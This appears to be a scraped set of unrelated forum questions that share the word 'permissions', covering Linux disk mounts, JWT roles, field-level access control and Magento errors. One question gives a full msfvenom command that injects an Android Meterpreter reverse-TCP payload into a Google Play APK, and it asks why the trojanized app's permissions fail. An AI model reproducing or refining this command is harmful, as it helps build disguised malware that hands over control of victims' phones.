Sudden change of Permissions

I have a pc with Ryzen 7 2700X, Asus Prime B450M-A and 32 GB RAM. My main OS is ubuntu 18.04 in a SSD, a secondary boot with win 10 1903 in another SSD, a nvme Force MP510 240 GB for my VM’s, and 2 HDD’s for storage. Force MP510 and the 2 HDD’s are set with manual mount options from Gnome Disks to mount automatically in /media. Up to yesterday Everything worked fine. Today suddenly when I try to create a file or a folder in one of those 3 disks (even when using sudo mkdir) I get error unable to create directory “A” : read-only file system. I tried sudo chmod a+rwx /path -R and it didn’t work. I tried chown user:group /path didn’t work either. Does anyone know how to make my disks available again without a format?

MSFVenom No Permissions on infected apk

When injecting payloads into existing apk files, I’ve noticed that sometimes the permissions written to the AndroidManifest.xml file are not always read.

I would have downloaded an apk file off Google Play and then run the following command:

msfvenom -x test.apk -p android/meterpreter/reverse_tcp LHOST=my_host LPORT=my_port -o exploited-test.apk 

The following command has worked for the app called “Pixel Dungeon”, and the following permission screen came up as expected: Image

However, it has not worked on apps like Kik, b612 camera filter, facebook lite and some others. I get the following screen when trying it on Kik: Image

Does it have to do with the fact that these apps are more secure or running on a version of android that uses a different permissions model?

Platforms:

Exploited Machine: Samsung Galaxy Tab SMT-530
apktool version: 2.4.0
Metasploit Framework: 5.0.28-dev

Not sure of any other version info that I can leave to help address the issue

How to set up two concurrent user with euqal rights and permissions?

I would like to have a system with two concurrent users, who are not able to see each others memory nor processes nor data.

So the users shall be able to do whatever they want in their ecosystem, but they should not be able to access any of the other’s activities.

Is the only way to accomplish that, to give root rights to a third party, who is managing the two users?

Should access permissions and roles be included in payload of JWT?

Should information about the permissions and roles of the client be included in JWT?

Having such information in JWT token will be very helpful as everytime a valid token comes, it would be easier to extract the information about the permission about the user and there will be no need to call the database for the same. But does including such information and not double checking the same in the database will be a security issue?

Or,

Information like the one mentioned above should not be a part of JWT ever, and only the database should be used for checking the access roles and permissions of a user?

Need suggestions for creating field level permissions which can be changed dynamically in an app

This is currently my User-Role-Permission model in the Db schema (excluded other tables to avoid confusion). My implementation goes like this: I have a Customer table and each Role has a different set of permissions to enable the User to interact with it. The User with Salesman role can only read from it while Admin has all the CRUD permissions. To do this I’ll save 4 entries in the Permission table with perm_type = “create customer”, “read customer” etc. I have a clear mapping of which role has which permissions and those can be changed dynamically as well; simply insert or delete entries in the Role_Permission table. So before performing any action I’ll just check the user role and whether the role has the required permission with a simple if statement in my code. enter image description here

All good so far but there’s a catch now. The Salesman is supposed to have permission to update Customer as well but only the balance field. Salesman cannot update anything else say Customer name, contact etc. There are 2 ways I can implement this:

  1. Grant update permission to Salesman but in the client side only display the form for updating balance. But then again someone can exploit this, right?
  2. Create 2 methods and their corresponding permissions in the Permission table: updateCustomer(Customer updatedCustomer) and updateCustomerBalance(int id, float balance). But what if in future I want salesman to be able to update contact or address of Customer? I’ll have to add more methods for that, compile and deploy my code again. I can do that for every field before deploying my app but it looks very cumbersome especially when I have at least 15 more tables.

So is there any other way I can do this?

Magento 2:Imported resource (image) could not be downloaded from external resource due to timeout or access permissions

I try to import product using csv file in localhost of wamp server but show error in Imported resource (image) could not be downloaded from external resource due to timeout or access permissions I add product images in pub/media/import

Keep getting “SQLSTATE[HY000] [1045]” despite database credentials and permissions being correct

I’m trying to install Magento 2.3.1 locally, and I keep running into this error when I adding the database. The problem is not the credentials. Everything I’ve read about this error implies it’s a problem with the database name, user, or password. I’ve tried different databases and users – with and without passwords – and get the same result each time.

I was able to install Magento 2 once after uninstalling and reinstalling MAMP Pro. Then, I updated my PC, and the site was no longer working. Instead there was an error message telling me to view the details in the exceptions log. This is roughly how the first line of that log file said:

main.CRITICAL: exception 'PDOException' with message 'SQLSTATE[HY000] [1045] Access denied for user 'root'@'localhost' (using password: YES) 

I deleted those site files and tried installing Magento again, and I was back to getting that error message. I don’t know what else to try. I’m not reinstalling MAMP Pro every time I restart my computer.

I have a somewhat unusual setup in that I use Windows 10 with MAMP Pro 4. I don’t know if that has something to do with it.